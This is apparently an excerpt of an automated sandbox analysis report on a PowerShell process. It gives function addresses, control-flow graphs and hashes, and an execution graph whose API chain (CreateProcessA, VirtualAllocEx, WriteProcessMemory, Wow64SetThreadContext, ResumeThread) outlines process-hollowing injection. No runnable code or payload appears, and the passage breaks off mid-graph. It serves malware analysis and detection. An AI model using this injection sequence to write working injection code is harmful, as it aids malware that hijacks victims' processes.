                                                  execution_graph 12481 4ae6198 12483 4ae61c0 12481->12483 12482 4ae63d5 12483->12482 12485 4aef1d8 12483->12485 12486 4aef1e6 12485->12486 12488 4aef255 12485->12488 12491 7132040 12486->12491 12537 713202f 12486->12537 12487 4aef219 12487->12483 12492 7132067 12491->12492 12493 7132133 12492->12493 12583 7132d53 12492->12583 12587 71335ac 12492->12587 12592 71332e9 12492->12592 12597 7132ae9 12492->12597 12605 71325bc 12492->12605 12610 713287f 12492->12610 12615 7132ebf 12492->12615 12620 71328f8 12492->12620 12625 7132f79 12492->12625 12630 7132b7b 12492->12630 12635 7133034 12492->12635 12640 71324b4 12492->12640 12645 7132437 12492->12645 12650 7133071 12492->12650 12655 713250d 12492->12655 12659 713308f 12492->12659 12664 7132f4f 12492->12664 12672 7132808 12492->12672 12677 71331c8 12492->12677 12685 7133009 12492->12685 12690 713340a 12492->12690 12695 71327cb 12492->12695 12700 7132405 12492->12700 12705 71333c6 12492->12705 12710 7132941 12492->12710 12715 7133141 12492->12715 12720 7133282 12492->12720 12725 7132643 12492->12725 12730 7133183 12492->12730 12734 713245c 12492->12734 12741 7132b5e 12492->12741 12746 713259f 12492->12746 12751 7133358 12492->12751 12756 7132a58 12492->12756 12761 7132b99 12492->12761 12766 713249b 12492->12766 12771 71328db 12492->12771 12779 7132dd5 12492->12779 12784 71330d5 12492->12784 12789 7132616 12492->12789 12797 7132c16 12492->12797 12802 7132750 12492->12802 12807 7132e52 12492->12807 12493->12487 12539 7132040 12537->12539 12538 7132133 12538->12487 12539->12538 12540 7132d53 2 API calls 12539->12540 12541 7132e52 2 API calls 12539->12541 12542 7132750 2 API calls 12539->12542 12543 7132c16 2 API calls 12539->12543 12544 7132616 4 API calls 12539->12544 12545 71330d5 2 API calls 12539->12545 12546 7132dd5 2 API calls 12539->12546 12547 71328db 4 API calls 12539->12547 12548 713249b 2 API calls 12539->12548 12549 7132b99 2 API calls 12539->12549 12550 7132a58 2 API calls 12539->12550 12551 7133358 2 API calls 12539->12551 12552 713259f 2 API calls 12539->12552 12553 7132b5e 2 API calls 12539->12553 12554 713245c 4 API calls 12539->12554 12555 7133183 2 API calls 12539->12555 12556 7132643 2 API calls 12539->12556 12557 7133282 2 API calls 12539->12557 12558 7133141 2 API calls 12539->12558 12559 7132941 2 API calls 12539->12559 12560 71333c6 2 API calls 12539->12560 12561 7132405 2 API calls 12539->12561 12562 71327cb 2 API calls 12539->12562 12563 713340a 2 API calls 12539->12563 12564 7133009 2 API calls 12539->12564 12565 71331c8 4 API calls 12539->12565 12566 7132808 2 API calls 12539->12566 12567 7132f4f 4 API calls 12539->12567 12568 713308f 2 API calls 12539->12568 12569 713250d 2 API calls 12539->12569 12570 7133071 2 API calls 12539->12570 12571 7132437 2 API calls 12539->12571 12572 71324b4 2 API calls 12539->12572 12573 7133034 2 API calls 12539->12573 12574 7132b7b 2 API calls 12539->12574 12575 7132f79 2 API calls 12539->12575 12576 71328f8 2 API calls 12539->12576 12577 7132ebf 2 API calls 12539->12577 12578 713287f 2 API calls 12539->12578 12579 71325bc 2 API calls 12539->12579 12580 7132ae9 4 API calls 12539->12580 12581 71332e9 2 API calls 12539->12581 12582 71335ac 2 API calls 12539->12582 12540->12539 12541->12539 12542->12539 12543->12539 12544->12539 12545->12539 12546->12539 12547->12539 12548->12539 12549->12539 12550->12539 12551->12539 12552->12539 12553->12539 12554->12539 12555->12539 12556->12539 12557->12539 12558->12539 12559->12539 12560->12539 12561->12539 12562->12539 12563->12539 12564->12539 12565->12539 12566->12539 12567->12539 12568->12539 12569->12539 12570->12539 12571->12539 12572->12539 12573->12539 12574->12539 12575->12539 12576->12539 12577->12539 12578->12539 12579->12539 12580->12539 12581->12539 12582->12539 12812 7133d61 12583->12812 12817 7133d70 12583->12817 12584 7132d6b 12589 7132443 12587->12589 12588 71322e8 12589->12588 12830 7131820 12589->12830 12834 713181b 12589->12834 12593 7132443 12592->12593 12594 71322e8 12593->12594 12595 7131820 WriteProcessMemory 12593->12595 12596 713181b WriteProcessMemory 12593->12596 12595->12593 12596->12593 12598 713245b 12597->12598 12599 71322e8 12598->12599 12838 7133ebb 12598->12838 12843 7133ec8 12598->12843 12599->12492 12600 7132443 12600->12599 12603 7131820 WriteProcessMemory 12600->12603 12604 713181b WriteProcessMemory 12600->12604 12603->12600 12604->12600 12606 7132443 12605->12606 12607 71322e8 12606->12607 12608 7131820 WriteProcessMemory 12606->12608 12609 713181b WriteProcessMemory 12606->12609 12608->12606 12609->12606 12611 7132443 12610->12611 12612 71322e8 12611->12612 12613 7131820 WriteProcessMemory 12611->12613 12614 713181b WriteProcessMemory 12611->12614 12613->12611 12614->12611 12616 7132443 12615->12616 12617 71322e8 12616->12617 12618 7131820 WriteProcessMemory 12616->12618 12619 713181b WriteProcessMemory 12616->12619 12618->12616 12619->12616 12622 7132443 12620->12622 12621 71322e8 12622->12621 12623 7131820 WriteProcessMemory 12622->12623 12624 713181b WriteProcessMemory 12622->12624 12623->12622 12624->12622 12626 7132443 12625->12626 12627 71322e8 12626->12627 12628 7131820 WriteProcessMemory 12626->12628 12629 713181b WriteProcessMemory 12626->12629 12628->12626 12629->12626 12631 7132443 12630->12631 12632 71322e8 12631->12632 12633 7131820 WriteProcessMemory 12631->12633 12634 713181b WriteProcessMemory 12631->12634 12633->12631 12634->12631 12636 7132443 12635->12636 12637 71322e8 12636->12637 12638 7131820 WriteProcessMemory 12636->12638 12639 713181b WriteProcessMemory 12636->12639 12638->12636 12639->12636 12642 7132443 12640->12642 12641 71322e8 12642->12641 12643 7131820 WriteProcessMemory 12642->12643 12644 713181b WriteProcessMemory 12642->12644 12643->12642 12644->12642 12646 7132443 12645->12646 12647 71322e8 12646->12647 12648 7131820 WriteProcessMemory 12646->12648 12649 713181b WriteProcessMemory 12646->12649 12648->12646 12649->12646 12651 7132443 12650->12651 12652 71322e8 12651->12652 12653 7131820 WriteProcessMemory 12651->12653 12654 713181b WriteProcessMemory 12651->12654 12653->12651 12654->12651 12657 7131820 WriteProcessMemory 12655->12657 12658 713181b WriteProcessMemory 12655->12658 12656 7132541 12657->12656 12658->12656 12661 7132443 12659->12661 12660 71322e8 12661->12660 12662 7131820 WriteProcessMemory 12661->12662 12663 713181b WriteProcessMemory 12661->12663 12662->12661 12663->12661 12666 7132615 12664->12666 12665 7132443 12667 71322e8 12665->12667 12670 7131820 WriteProcessMemory 12665->12670 12671 713181b WriteProcessMemory 12665->12671 12666->12665 12848 7133f13 12666->12848 12853 7133f20 12666->12853 12670->12665 12671->12665 12674 7132443 12672->12674 12673 71322e8 12674->12673 12675 7131820 WriteProcessMemory 12674->12675 12676 713181b WriteProcessMemory 12674->12676 12675->12674 12676->12674 12678 71331d2 12677->12678 12683 7133f13 2 API calls 12678->12683 12684 7133f20 2 API calls 12678->12684 12679 7132443 12680 71322e8 12679->12680 12681 7131820 WriteProcessMemory 12679->12681 12682 713181b WriteProcessMemory 12679->12682 12681->12679 12682->12679 12683->12679 12684->12679 12686 7132443 12685->12686 12687 71322e8 12686->12687 12688 7131820 WriteProcessMemory 12686->12688 12689 713181b WriteProcessMemory 12686->12689 12688->12686 12689->12686 12691 7132443 12690->12691 12692 71322e8 12691->12692 12693 7131820 WriteProcessMemory 12691->12693 12694 713181b WriteProcessMemory 12691->12694 12693->12691 12694->12691 12696 7132443 12695->12696 12697 71322e8 12696->12697 12698 7131820 WriteProcessMemory 12696->12698 12699 713181b WriteProcessMemory 12696->12699 12698->12696 12699->12696 12701 7132411 12700->12701 12702 71322e8 12701->12702 12703 7131820 WriteProcessMemory 12701->12703 12704 713181b WriteProcessMemory 12701->12704 12703->12701 12704->12701 12707 7132443 12705->12707 12706 71322e8 12707->12706 12708 7131820 WriteProcessMemory 12707->12708 12709 713181b WriteProcessMemory 12707->12709 12708->12707 12709->12707 12711 7132443 12710->12711 12712 71322e8 12711->12712 12713 7131820 WriteProcessMemory 12711->12713 12714 713181b WriteProcessMemory 12711->12714 12713->12711 12714->12711 12716 7132443 12715->12716 12717 71322e8 12716->12717 12718 7131820 WriteProcessMemory 12716->12718 12719 713181b WriteProcessMemory 12716->12719 12718->12716 12719->12716 12721 7132443 12720->12721 12722 71322e8 12721->12722 12723 7131820 WriteProcessMemory 12721->12723 12724 713181b WriteProcessMemory 12721->12724 12723->12721 12724->12721 12726 7132443 12725->12726 12727 71322e8 12726->12727 12728 7131820 WriteProcessMemory 12726->12728 12729 713181b WriteProcessMemory 12726->12729 12728->12726 12729->12726 12866 7133db8 12730->12866 12871 7133dc8 12730->12871 12731 71331a5 12739 7133ebb 2 API calls 12734->12739 12740 7133ec8 2 API calls 12734->12740 12735 7132443 12736 71322e8 12735->12736 12737 7131820 WriteProcessMemory 12735->12737 12738 713181b WriteProcessMemory 12735->12738 12737->12735 12738->12735 12739->12735 12740->12735 12742 7132b6b 12741->12742 12744 7131820 WriteProcessMemory 12742->12744 12745 713181b WriteProcessMemory 12742->12745 12743 7132c63 12744->12743 12745->12743 12747 7132443 12746->12747 12748 71322e8 12747->12748 12749 7131820 WriteProcessMemory 12747->12749 12750 713181b WriteProcessMemory 12747->12750 12749->12747 12750->12747 12752 713336c 12751->12752 12884 7131ba8 12752->12884 12888 7131b9d 12752->12888 12757 7132443 12756->12757 12758 71322e8 12757->12758 12759 7131820 WriteProcessMemory 12757->12759 12760 713181b WriteProcessMemory 12757->12760 12759->12757 12760->12757 12762 7132443 12761->12762 12763 71322e8 12762->12763 12764 7131820 WriteProcessMemory 12762->12764 12765 713181b WriteProcessMemory 12762->12765 12764->12762 12765->12762 12767 7132443 12766->12767 12768 71322e8 12766->12768 12767->12768 12769 7131820 WriteProcessMemory 12767->12769 12770 713181b WriteProcessMemory 12767->12770 12769->12767 12770->12767 12772 71328e8 12771->12772 12773 7132443 12772->12773 12777 7133f13 2 API calls 12772->12777 12778 7133f20 2 API calls 12772->12778 12774 71322e8 12773->12774 12775 7131820 WriteProcessMemory 12773->12775 12776 713181b WriteProcessMemory 12773->12776 12775->12773 12776->12773 12777->12773 12778->12773 12780 7132443 12779->12780 12781 71322e8 12780->12781 12782 7131820 WriteProcessMemory 12780->12782 12783 713181b WriteProcessMemory 12780->12783 12782->12780 12783->12780 12786 7132443 12784->12786 12785 71322e8 12786->12785 12787 7131820 WriteProcessMemory 12786->12787 12788 713181b WriteProcessMemory 12786->12788 12787->12786 12788->12786 12790 7132620 12789->12790 12795 7133f13 2 API calls 12790->12795 12796 7133f20 2 API calls 12790->12796 12791 7132443 12792 71322e8 12791->12792 12793 7131820 WriteProcessMemory 12791->12793 12794 713181b WriteProcessMemory 12791->12794 12793->12791 12794->12791 12795->12791 12796->12791 12798 7132c20 12797->12798 12800 7131820 WriteProcessMemory 12798->12800 12801 713181b WriteProcessMemory 12798->12801 12799 7132c63 12800->12799 12801->12799 12805 7131820 WriteProcessMemory 12802->12805 12806 713181b WriteProcessMemory 12802->12806 12803 7132443 12803->12802 12804 71322e8 12803->12804 12805->12803 12806->12803 12808 7132443 12807->12808 12809 71322e8 12808->12809 12810 7131820 WriteProcessMemory 12808->12810 12811 713181b WriteProcessMemory 12808->12811 12810->12808 12811->12808 12813 7133d70 12812->12813 12822 71315d8 12813->12822 12826 71315d0 12813->12826 12814 7133da5 12814->12584 12818 7133d85 12817->12818 12820 71315d0 Wow64SetThreadContext 12818->12820 12821 71315d8 Wow64SetThreadContext 12818->12821 12819 7133da5 12819->12584 12820->12819 12821->12819 12823 7131621 Wow64SetThreadContext 12822->12823 12825 7131699 12823->12825 12825->12814 12827 71315d8 Wow64SetThreadContext 12826->12827 12829 7131699 12827->12829 12829->12814 12831 713186c WriteProcessMemory 12830->12831 12833 7131905 12831->12833 12833->12589 12835 713186c WriteProcessMemory 12834->12835 12837 7131905 12835->12837 12837->12589 12839 7133ec8 12838->12839 12841 71315d0 Wow64SetThreadContext 12839->12841 12842 71315d8 Wow64SetThreadContext 12839->12842 12840 7133efd 12840->12600 12841->12840 12842->12840 12844 7133edd 12843->12844 12846 71315d0 Wow64SetThreadContext 12844->12846 12847 71315d8 Wow64SetThreadContext 12844->12847 12845 7133efd 12845->12600 12846->12845 12847->12845 12849 7133f20 12848->12849 12858 71301b1 12849->12858 12862 71301b8 12849->12862 12850 7133f52 12850->12665 12854 7133f35 12853->12854 12856 71301b1 ResumeThread 12854->12856 12857 71301b8 ResumeThread 12854->12857 12855 7133f52 12855->12665 12856->12855 12857->12855 12859 71301b8 ResumeThread 12858->12859 12861 7130248 12859->12861 12861->12850 12863 71301fc ResumeThread 12862->12863 12865 7130248 12863->12865 12865->12850 12867 7133dc8 12866->12867 12876 7131700 12867->12876 12880 71316fb 12867->12880 12868 7133e06 12868->12731 12872 7133ddd 12871->12872 12874 7131700 VirtualAllocEx 12872->12874 12875 71316fb VirtualAllocEx 12872->12875 12873 7133e06 12873->12731 12874->12873 12875->12873 12877 7131744 VirtualAllocEx 12876->12877 12879 71317bc 12877->12879 12879->12868 12881 7131704 VirtualAllocEx 12880->12881 12883 71317bc 12881->12883 12883->12868 12885 7131c2f 12884->12885 12885->12885 12886 7131e22 CreateProcessA 12885->12886 12887 7131e8c 12886->12887 12887->12887 12889 7131c2f CreateProcessA 12888->12889 12891 7131e8c 12889->12891 12891->12891

                                                  Executed Functions

                                                  Function 04AE6188 Relevance: 1.5, Strings: 1, Instructions: 236COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 418 4ae6188-4ae61be 420 4ae61c5-4ae61fc 418->420 421 4ae61c0 418->421 424 4ae61ff-4ae6205 420->424 421->420 425 4ae620e-4ae620f 424->425 426 4ae6207 424->426 433 4ae6214-4ae6249 425->433 434 4ae63d5-4ae63dd 425->434 427 4ae636d-4ae6388 426->427 428 4ae638d-4ae63b1 call 4ae5334 426->428 429 4ae64cb-4ae64e6 426->429 430 4ae62a9-4ae62ad 426->430 431 4ae63f9-4ae6478 426->431 432 4ae63b6-4ae63d0 426->432 426->433 426->434 435 4ae6255-4ae6298 426->435 436 4ae62e2-4ae635a 426->436 437 4ae62c0-4ae62c6 call 4aef0df 426->437 438 4ae63e0-4ae63e1 426->438 427->424 428->424 429->424 439 4ae63e2-4ae63f4 430->439 440 4ae62b3-4ae62bb 430->440 466 4ae6481-4ae648a call 4aef1d8 431->466 432->424 433->424 457 4ae624b-4ae6253 433->457 435->424 461 4ae629e-4ae62a4 435->461 436->424 464 4ae6360-4ae6368 436->464 446 4ae62cc-4ae62dd 437->446 438->439 439->424 440->424 446->424 457->424 461->424 464->424 467 4ae6490-4ae64ba 466->467 467->424 469 4ae64c0-4ae64c6 467->469 469->424
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2255823434.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_4ae0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: SjP
                                                  • API String ID: 0-1466192239
                                                  • Opcode ID: dd5c5d832102b0d61786b9f29959d6e83a45ba1c75a1f9ea37b109858f3fbf6e
                                                  • Instruction ID: 402b72d93890575a2d0a37102ccd3c3fdc69ac429a2d58dfde8c243527c0012b
                                                  • Opcode Fuzzy Hash: dd5c5d832102b0d61786b9f29959d6e83a45ba1c75a1f9ea37b109858f3fbf6e
                                                  • Instruction Fuzzy Hash: 6AA112B4E05208DFDB04DFA9D499AAEBBF2FF88300F14802AD525AB395DB755945CF80
                                                  Function 04AE6198 Relevance: 1.5, Strings: 1, Instructions: 229COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 472 4ae6198-4ae61be 473 4ae61c5-4ae61fc 472->473 474 4ae61c0 472->474 477 4ae61ff-4ae6205 473->477 474->473 478 4ae620e-4ae620f 477->478 479 4ae6207 477->479 486 4ae6214-4ae6249 478->486 487 4ae63d5-4ae63dd 478->487 480 4ae636d-4ae6388 479->480 481 4ae638d-4ae63b1 call 4ae5334 479->481 482 4ae64cb-4ae64e6 479->482 483 4ae62a9-4ae62ad 479->483 484 4ae63f9-4ae648a call 4aef1d8 479->484 485 4ae63b6-4ae63d0 479->485 479->486 479->487 488 4ae6255-4ae6298 479->488 489 4ae62e2-4ae635a 479->489 490 4ae62c0-4ae62c6 call 4aef0df 479->490 491 4ae63e0-4ae63e1 479->491 480->477 481->477 482->477 492 4ae63e2-4ae63f4 483->492 493 4ae62b3-4ae62bb 483->493 520 4ae6490-4ae64ba 484->520 485->477 486->477 510 4ae624b-4ae6253 486->510 488->477 514 4ae629e-4ae62a4 488->514 489->477 517 4ae6360-4ae6368 489->517 499 4ae62cc-4ae62dd 490->499 491->492 492->477 493->477 499->477 510->477 514->477 517->477 520->477 522 4ae64c0-4ae64c6 520->522 522->477
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2255823434.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_4ae0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: SjP
                                                  • API String ID: 0-1466192239
                                                  • Opcode ID: 48b9a999a8b24e2281a20a0ec01c322018a7050172ec15007aed8b431a09b288
                                                  • Instruction ID: 48cddb4d26a654ce3ca3775a4576a4890d6709eceaef500348869b699fc1bc6a
                                                  • Opcode Fuzzy Hash: 48b9a999a8b24e2281a20a0ec01c322018a7050172ec15007aed8b431a09b288
                                                  • Instruction Fuzzy Hash: ADA112B4E01208DFDB04DFA9D499AAEBBF2FF88300F249029D525A7385DB756945CF80
                                                  Function 04AEF1D8 Relevance: 1.4, Strings: 1, Instructions: 179COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2255823434.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_4ae0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: E>I
                                                  • API String ID: 0-3352654960
                                                  • Opcode ID: 2f403c28475803f6a1b7c69d3973ff390863a66550065814ad00f342ca187b7f
                                                  • Instruction ID: c438514a1d641a579e97b3ad57c0cd936100ef37024c7b530133e1f2a9bfe552
                                                  • Opcode Fuzzy Hash: 2f403c28475803f6a1b7c69d3973ff390863a66550065814ad00f342ca187b7f
                                                  • Instruction Fuzzy Hash: EE8129B4E00208DFDB44DF69D945BADBBF2FB49310F5080AAD819AB391DB396945CF10
                                                  Function 04AEF57D Relevance: 1.4, Strings: 1, Instructions: 174COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2255823434.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_4ae0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: E>I
                                                  • API String ID: 0-3352654960
                                                  • Opcode ID: 62c5f50a538f7dd906f023d863a4d66ba60b0592a24c28ca2caf5dc02fd8f04f
                                                  • Instruction ID: 9b3f492baa5c7c07d38c4c16a43f5d2124ce8dc5f6039f598e2b0efdda9718c3
                                                  • Opcode Fuzzy Hash: 62c5f50a538f7dd906f023d863a4d66ba60b0592a24c28ca2caf5dc02fd8f04f
                                                  • Instruction Fuzzy Hash: B5811AB4A40208DFDB44DF69D549BADB7F2FB58310F4081A9E81AAB391DB39A944CF00
                                                  Function 04AEF60D Relevance: 1.4, Strings: 1, Instructions: 174COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2255823434.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_4ae0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: E>I
                                                  • API String ID: 0-3352654960
                                                  • Opcode ID: 385847e95037567a87d516f337d5f55bca9cf3289399ba08bf17f71785d937aa
                                                  • Instruction ID: dd779b39dbc7a1619cdee3100dcead00a05ec8c3a9131cfbee022d083849df3f
                                                  • Opcode Fuzzy Hash: 385847e95037567a87d516f337d5f55bca9cf3289399ba08bf17f71785d937aa
                                                  • Instruction Fuzzy Hash: 0D810AB4E40208DFDB44DF69D559BADBBF2FB48310F5081A9D81AAB391DB39A945CF00
                                                  Function 04AEF228 Relevance: 1.4, Strings: 1, Instructions: 173COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2255823434.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_4ae0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: E>I
                                                  • API String ID: 0-3352654960
                                                  • Opcode ID: 04ed7ab61e0e2d2557c30bdade8ad095305f5de1af6f8e777e2406e4ce716103
                                                  • Instruction ID: bf3ea27acd29579df5641e20a8eccd5e125d844e671dac4d8e4496c2ba9bbc14
                                                  • Opcode Fuzzy Hash: 04ed7ab61e0e2d2557c30bdade8ad095305f5de1af6f8e777e2406e4ce716103
                                                  • Instruction Fuzzy Hash: 88813974A00208DFDB44DF69D945BADBBF2FB49310F5080A9D919AB391DB396985CF10
                                                  Function 04AEF238 Relevance: 1.4, Strings: 1, Instructions: 159COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2255823434.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_4ae0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: E>I
                                                  • API String ID: 0-3352654960
                                                  • Opcode ID: 829c09327c3aeadf31a5a8c948b54acac36c041b5020d51b7832828aed9e6284
                                                  • Instruction ID: 2a69258f9c42961b8e3d4ca4e14240fd107f0dfa021cdf3567589c9ecae0294a
                                                  • Opcode Fuzzy Hash: 829c09327c3aeadf31a5a8c948b54acac36c041b5020d51b7832828aed9e6284
                                                  • Instruction Fuzzy Hash: 74712B74A00208DFDB44DF69D959BADB7F6FB48310F4080A9D91AAB391DB39A984CF10
                                                  Function 04AEF51E Relevance: 1.4, Strings: 1, Instructions: 146COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2255823434.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_4ae0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: E>I
                                                  • API String ID: 0-3352654960
                                                  • Opcode ID: cbdecaa90e1301dbc9b5f3fafd329b1d9b62bae1c5cd764c46ecc58ae149cdc4
                                                  • Instruction ID: 395190ab295e88523cf4c856ba5f8379380936351282f053c9e45c72da0bccdb
                                                  • Opcode Fuzzy Hash: cbdecaa90e1301dbc9b5f3fafd329b1d9b62bae1c5cd764c46ecc58ae149cdc4
                                                  • Instruction Fuzzy Hash: 06612AB4A40218DFDB44DF69D949BADB7F2FB48310F4081A9D81AEB391DB39A945CF10
                                                  Function 079708F8 Relevance: 8.0, Strings: 6, Instructions: 463COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 0 79708f8-797091a 1 7970920-7970925 0->1 2 7970a9d-7970ae2 0->2 3 7970927-797092d 1->3 4 797093d-7970941 1->4 10 7970c64-7970caa 2->10 11 7970ae8-7970aed 2->11 8 7970931-797093b 3->8 9 797092f 3->9 6 7970947-797094b 4->6 7 7970a48-7970a52 4->7 14 797094d-797095e 6->14 15 797098b 6->15 12 7970a54-7970a5d 7->12 13 7970a60-7970a66 7->13 8->4 9->4 31 7970e54-7970e84 10->31 32 7970cb0-7970cb5 10->32 17 7970b05-7970b09 11->17 18 7970aef-7970af5 11->18 20 7970a6c-7970a78 13->20 21 7970a68-7970a6a 13->21 14->2 34 7970964-7970969 14->34 16 797098d-797098f 15->16 16->7 22 7970995-7970999 16->22 28 7970c0f-7970c19 17->28 29 7970b0f-7970b13 17->29 23 7970af7 18->23 24 7970af9-7970b03 18->24 26 7970a7a-7970a9a 20->26 21->26 22->7 30 797099f-79709a3 22->30 23->17 24->17 35 7970c27-7970c2d 28->35 36 7970c1b-7970c24 28->36 37 7970b15-7970b26 29->37 38 7970b53 29->38 42 79709c6 30->42 43 79709a5-79709ae 30->43 69 7970e86-7970ea3 31->69 70 7970ebd-7970ec7 31->70 46 7970cb7-7970cbd 32->46 47 7970ccd-7970cd1 32->47 48 7970981-7970989 34->48 49 797096b-7970971 34->49 39 7970c33-7970c3f 35->39 40 7970c2f-7970c31 35->40 37->10 71 7970b2c-7970b31 37->71 44 7970b55-7970b57 38->44 57 7970c41-7970c61 39->57 40->57 59 79709c9-79709d6 42->59 54 79709b5-79709c2 43->54 55 79709b0-79709b3 43->55 44->28 60 7970b5d-7970b61 44->60 61 7970cc1-7970ccb 46->61 62 7970cbf 46->62 52 7970cd7-7970cdb 47->52 53 7970dfc-7970e06 47->53 48->16 50 7970975-797097f 49->50 51 7970973 49->51 50->48 51->48 64 7970cdd-7970cee 52->64 65 7970d1b 52->65 66 7970e14-7970e1a 53->66 67 7970e08-7970e11 53->67 68 79709c4 54->68 55->68 91 79709ee-7970a45 59->91 92 79709d8-79709de 59->92 60->28 73 7970b67-7970b6b 60->73 61->47 62->47 64->31 101 7970cf4-7970cf9 64->101 79 7970d1d-7970d1f 65->79 75 7970e20-7970e2c 66->75 76 7970e1c-7970e1e 66->76 68->59 107 7970ea5-7970eb7 69->107 108 7970f0d-7970f12 69->108 84 7970ed0-7970ed6 70->84 85 7970ec9-7970ecd 70->85 81 7970b33-7970b39 71->81 82 7970b49-7970b51 71->82 86 7970b8e 73->86 87 7970b6d-7970b76 73->87 90 7970e2e-7970e51 75->90 76->90 79->53 93 7970d25-7970d29 79->93 95 7970b3d-7970b47 81->95 96 7970b3b 81->96 82->44 97 7970edc-7970ee8 84->97 98 7970ed8-7970eda 84->98 88 7970b91-7970b9d 86->88 99 7970b7d-7970b8a 87->99 100 7970b78-7970b7b 87->100 122 7970bb5-7970c0c 88->122 123 7970b9f-7970ba5 88->123 103 79709e2-79709e4 92->103 104 79709e0 92->104 93->53 106 7970d2f-7970d33 93->106 95->82 96->82 110 7970eea-7970f0a 97->110 98->110 111 7970b8c 99->111 100->111 114 7970d11-7970d19 101->114 115 7970cfb-7970d01 101->115 103->91 104->91 106->53 117 7970d39-7970d5f 106->117 107->70 108->107 111->88 114->79 124 7970d05-7970d0f 115->124 125 7970d03 115->125 117->53 134 7970d65-7970d69 117->134 126 7970ba7 123->126 127 7970ba9-7970bab 123->127 124->114 125->114 126->122 127->122 135 7970d8c 134->135 136 7970d6b-7970d74 134->136 139 7970d8f-7970d9c 135->139 137 7970d76-7970d79 136->137 138 7970d7b-7970d88 136->138 140 7970d8a 137->140 138->140 141 7970da2-7970df9 139->141 140->139
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2283191494.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_7970000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (o]q$(o]q$4']q$4']q$4']q$4']q
                                                  • API String ID: 0-3265970930
                                                  • Opcode ID: 9ed155c26ff7c8920985c634c9cfa62264600f5407359ae2b3eb50ae8012348a
                                                  • Instruction ID: b5c7184b6ea83daeb407c5c9a8d318827d84ea861c7c841892927c27e1a0363f
                                                  • Opcode Fuzzy Hash: 9ed155c26ff7c8920985c634c9cfa62264600f5407359ae2b3eb50ae8012348a
                                                  • Instruction Fuzzy Hash: 6FF139B0B04309DFDB188F6DC8447AABBAAFF85318F14C47AE4598B250DB71D941CBA1
                                                  Function 0797036D Relevance: 6.4, Strings: 5, Instructions: 134COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 144 797036d-7970370 145 7970376-797037e 144->145 146 7970372-7970374 144->146 147 7970396-797039a 145->147 148 7970380-7970386 145->148 146->145 151 79703a0-79703a4 147->151 152 79704fb-7970505 147->152 149 797038a-7970394 148->149 150 7970388 148->150 149->147 150->147 153 79703b7 151->153 154 79703a6-79703b5 151->154 155 7970507-7970510 152->155 156 7970513-7970519 152->156 157 79703b9-79703bb 153->157 154->157 159 797051f-797052b 156->159 160 797051b-797051d 156->160 157->152 161 79703c1-79703e1 157->161 162 797052d-797054b 159->162 160->162 168 79703e3-79703fe 161->168 169 7970400 161->169 170 7970402-7970404 168->170 169->170 170->152 172 797040a-797040c 170->172 173 797040e-797041a 172->173 174 797041c 172->174 175 797041e-7970420 173->175 174->175 175->152 177 7970426-7970446 175->177 180 797045e-7970462 177->180 181 7970448-797044e 177->181 184 7970464-797046a 180->184 185 797047c-7970480 180->185 182 7970452-7970454 181->182 183 7970450 181->183 182->180 183->180 186 797046e-797047a 184->186 187 797046c 184->187 188 7970487-7970489 185->188 186->185 187->185 190 79704a1-79704f8 188->190 191 